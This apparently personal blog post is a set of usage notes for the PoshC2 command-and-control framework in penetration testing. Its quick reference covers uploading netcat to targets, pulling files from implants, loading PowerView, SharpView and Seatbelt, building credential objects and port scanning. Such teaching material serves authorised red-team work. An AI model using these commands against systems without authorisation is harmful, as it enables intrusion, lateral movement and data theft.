This is an ongoing post containing my notes on PoshC2 usage.
What is PoshC2?
PoshC2 is a command and control software. It is used to carry out post-exploitation tasks such as persistence, privilege escalation, lateral movements etc. during penetration testing and red teaming exercises. It supports Python3, PowerShell (v2 and v5), C# and C++. The official documentation is available here.
All of PoshC2 functionality can be divided into five components:
PoshC2 Server – Serves payloads that can be executed on target machine(s) and send a connection back to PoshC2. The server console also displays the output of command(s) executed on an implant. The server is written in Python.
Implants Receiver – Listens for the incoming implant connections and aggregates them. It is also used to load modules and execute commands on a single, multiple or all implants.
Implants – Target machine(s) connected to PoshC2.
Modules – Scripts (PowerShell and Python) and executable binaries (C#) that help in conducting various post-exploitation tasks such as enumeration, privilege escalation, lateral movement, hash dump, port forwarding etc. A comprehensive list of modules is available here.
How to use?
The following video shows how to get PoshC2 up and running quickly. It covers:
- Installation on Kali Linux 2020.2
- Configuring PoshC2
- Running Posh-server and implants receiver
- Managing implants
- Loading C# and PowerShell modules on an Implant
- Running commands on an implant
Read this to learn more about the lab environment used in this video.
Useful Commands (C# Implants)
- To select a single implant, enter the ImplantID
- To select multiple implants, enter a comma separated list of ImplantIDs
- To select all implants, enter ALL
Quick Reference List of Commands
Issue the following command when connected to an implant(s)
upload-file <source file path> <destination file path> Example: upload-file /usr/share/windows-binaries/nc.exe C:\Users\Public\nc.exe
download-file <file path> Example: download-file 'C:\\Users\\Public\\supersecretdata.txt'
This will save a copy of the target file in the PoshC2 project directory.
To list implant specific modules, select an implant and issue the following command:
To list all modules, issue the following command at implant selection prompt:
Load a C# Module
loadmodule <module name> Example: loadmodule SharpView.exe
Load a PowerShell Module
pslo <module name> Example: pslo powerview.ps1
You can also use loadmoduleforce to load modules.
Execute a PowerShell Command
sharpps <command> Example: sharpps Get-ChildItem -Force -Recurse
Convert Username and Password to a PSCredentials object
sharpps [string]$userName = 'IND\user.ind02' sharpps [string]$userPassword = '[email protected]' sharpps [securestring]$secStringPassword = ConvertTo-SecureString $userPassword -AsPlainText -Force sharpps [pscredential]$credObject = New-Object System.Management.Automation.PSCredential ($userName, $secStringPassword)
After executing above commands, $credObject can be passed as a value to -Credential parameter in PowerShell commands which accept this parameter.
Enumerate an Implant
ls-recurse <directory path> Example: ls-recurse C:\Users get-userinfo get-computerinfo loadmodule Seatbelt.exe seatbelt all sharpup
portscan <IP> <port> <delay-in-seconds> <max thread> Example: portscan "192.168.3.8" "1-1000" 1 100
Uday Mittal is a cybersecurity professional with rich working experience working with various industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM, CRISC among others. He speaks on cybersecurity awareness, offensive security research etc. and has authored various articles on topics related to cyber security and software development for a leading magazine on open source software.